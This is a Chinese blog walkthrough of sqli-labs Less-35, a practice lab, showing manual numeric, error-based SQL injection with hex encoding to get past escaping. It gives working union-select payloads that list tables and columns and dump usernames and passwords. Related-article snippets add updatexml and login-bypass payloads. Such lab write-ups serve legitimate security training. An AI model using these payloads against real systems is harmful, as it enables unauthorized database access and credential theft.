(手工)【sqli-labs35】宽字节、数字型、编码、报错注入

最新推荐文章于 2023-05-02 22:19:21 发布
最新推荐文章于 2023-05-02 22:19:21 发布
阅读量705 收藏 4
点赞数 3
分类专栏: # 【全】sqlil-abs靶场 文章标签: web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125792425
版权

目录

一、推荐:

二、(手工)SQL注入基本步骤:

三、Less35(GET-Bypass AddSlashes(we dont need them) integer based)

3.1、简介:(宽字节注入-编码注入-报错回显-数字型注入)

3.2、第一步:注入点测试

 3.3、第二步:分析过滤

3.4、第三步:判断字段数/回显位

3.5、第四步:暴库

3.6、第五步:爆表名

3.7、第六步:爆字段

3.8、第七步:爆数据

一、推荐:

【SQL注入】宽字节注入:原理、利用https://blog.csdn.net/qq_53079406/article/details/125785293?spm=1001.2014.3001.5501

【SQL注入-可回显】报错注入:简介、相关函数、利用方法https://blog.csdn.net/qq_53079406/article/details/125017089?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165777639916781647571668%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165777639916781647571668&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125017089-null-null.185%5Ev2%5Econtrol&utm_term=%E6%8A%A5%E9%94%99&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125017089?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165777639916781647571668%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165777639916781647571668&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125017089-null-null.185%5Ev2%5Econtrol&utm_term=%E6%8A%A5%E9%94%99&spm=1018.2226.3001.4450

【SQL注入】数字型注入 & 字符型注入https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501

【WAF绕过】SQL注入、文件上传、XSShttps://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450

二、(手工)SQL注入基本步骤:

第一步:注入点测试

第二步:分析权限

第三步:判断字段数

第四步:爆数据库名

第五步:爆表名

第六步:爆字段名

第七步:爆数据

三、Less35(GET-Bypass AddSlashes(we dont need them) integer based)

3.1、简介:(宽字节注入-编码注入-报错回显-数字型注入)

请求方法:GET

方法:宽字节注入+闭合(数字型注入)+编码+报错回显

3.2、第一步:注入点测试

输入?id=1 

 后面加上单引号、双引号都报错

 

假设有引号闭合,注释后面

?id=1'--+

结果单双引号还是报错

报错,说明存在注入点

单双引号都报错,说明为数字型注入

(即不需要闭合) 

 3.3、第二步:分析过滤

方法一:

考虑一步一步将注入语句字符一个一个替换掉,直到不报错(浪费时间)

或者全部替换(如果报错,不知道哪里被过滤了)

方法二:

获取源码进行白盒审计(最优)

方法三:

eg:输入?id=and or union select --+ updatexml # extractvalue(重要的都输进去)

看输入回显过滤语句的情况

3.4、第三步:判断字段数/回显位

?id=1 union select 1,2,3 --+

回显正常

 

?id=1 union select 1,2,3,4 --+

报错

 

 说明字段数为3

判断回显位

?id=-1 union select 1,2,3 --+ 

3.5、第四步:暴库

?id=-1 union select 1,2,database()--+

3.6、第五步:爆表名

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+

'security'的单引号也会导致注入报错

可以直接进行十六进制编码,或者使用database()

 

3.7、第六步:爆字段

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

'user'的单引号导致注入报错,可以直接进行十六进制编码

 

3.8、第七步:爆数据

?id=-1 union select 1,2,group_concat(username,password) from security.users--+

 

黑色地带(崛起)
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 8285
sql注入集合
sqli-labs(35)
weixin_30790841的博客
06-01 226
0X01 构造闭合 发现不需要闭合 ?id=-1 union select 1,database(),3 0X02组合拳打法 转载于:https://www.cnblogs.com/-zhong/p/10959969.html
字节的深入了解
→_→
05-07 6571
01 背景知识 字符集 在了解字节注入之前,我们先来看一看字符集是什么。字符集也叫字符编码,是一种将符号转换为二进制数的映射关系。 几种常见的字符集: ASCII编码:单字节编码 latin1编码:单字节编码 gbk编码:使用一字节和双字节编码,0x00-0x7F范围内是一位,和 ASCII 保持一致。双字节的第一字节范围是0x81-0xFE UTF-8编码:使用一至四字节编码,0x......
理论篇8:SQL注入(字符型注入和数字型注入)
aiojay的博客
05-02 2758
SQL注入(字符型注入和数字型注入),Mysql中 int(3) 类型的含义,判断MYSQL注入闭合方式:
【pikachu-SQL】数字型注入(post)2022,超详细
weixin_46497491的博客
09-10 1510
【pikachu-SQL】数字型注入(post)2022,超详细,web渗透,sql注入,渗透测试
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
安装sqli-labs
最新发布
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-labs/Less-35
m0_71299382的博客
11-21 121
sqli-labs第三十五关
DVWA之sql注入——联合注入注入
Williamanddog的博客
12-20 1773
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
字节注入之sql手工注入 PK sqlmap工具注入
帅醉了的博客
11-15 1408
简单概述字节注入
sqlilab 11-17之看不懂的教程
跳房子的博客
01-19 753
第十一关:打开发现是一个登录页面,这时候我第一时间想到的是万能密码,通过尝试,username输入admin' or 1 -- #后成功登录,接着是order by查询字段数; 输入1‘ order by 3 登录后页面,说明有2个字段; 然后输入1' union select 1,2 #,判断出页面有两个显示位; 接下来就是爆数据库名,数据表名,字段名了; 爆数据库名:123' un...
sqli-labs实战记录(二)
0verWatch的博客
08-29 497
Less-23 从这里开始应该是有做了防护,我们可以边看源代码练习代码审计,一边学习各种过waf的技巧了 这一题查看源代码的话发现注释符被过滤掉了 $reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, $replac
SQLi LABS Less-35
热门推荐
wangyuxiang946的博客
06-28 1万+
第三十五关注入点为 数值型 , 注入方式为 注入 此关卡通过 代码WAF 转义了单引号' , 我们使用 编译 绕过WAF , 先上结果 ?id=1 and updatexml(1,concat(0x7e, substr((select group_concat(schema_name) from information_schema.schemata),62,31) ),3) ?id=1 and updatexml(1,concat(0x7e, substr((select gr.
SQL手工注入——数字型注入
高毅的博客
07-01 2275
当输入的参数是整数时,若存在漏洞,则认为是数字型注入,如xxx.php?id=88形式。 这是最简单的一种注入。 测试过程一般如下: 1、对url:xxx.php?id=88后添加',形成xxx.php?id=88',观察页面是否出现异常。若系统没有做防护,则出现异常。 2、对url:xxx.php?id=88后添加and 1=1,能够正常执行,返回结果与原始请求无任何差异。 3、对ur
【Less-2】单引号数字型注入
ssrf
10-27 197
目录前言1、测试是否存在注入点 前言 提示:这个题目是基于误,单引号,数字型注入 1、测试是否存在注入点 http://localhost/sqli-labs/Less-2/?id=1' http://localhost/sqli-labs/Less-2/?id=1 and 1=1 -- + http://localhost/sqli-labs/Less-2/?id=1 and 1=2 -- + 证明我们后面输入的sql语句被带入到数据库进行查询了,说明存在sql注入 后面的查询语句同.
SQL注入之数字型注入实战案例详解
weixin_39096432的博客
12-15 1406
SQL注入之数字型注入实战案例详解 ———— 97℃oldboy SQL注入种类多种多样,此文将通过一个实例详细讲解数字型注入。 在我们拿到一个网页时,首先判断它是否存在注入漏洞最简单粗暴的方法就是在参数后面加一个单引号,如果网页,那么说明有可能存在注入漏洞了。请看下面的网页操作: 上面是一个正常的网页,我们先检测网页是否有参数,在网址后面加上:?id=1 即http://192.168.114.147/sqli-labs-master/Less
sqli-labs字节注入关卡
09-27
sqli-labs字节注入关卡是指在sqli-labs闯关中的相关关卡,用于学习和理解字节注入漏洞。它是通过将character_set_client设置为binary来解决字节或多字节问题的方法,从而有效避免字符注入。通过使用工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值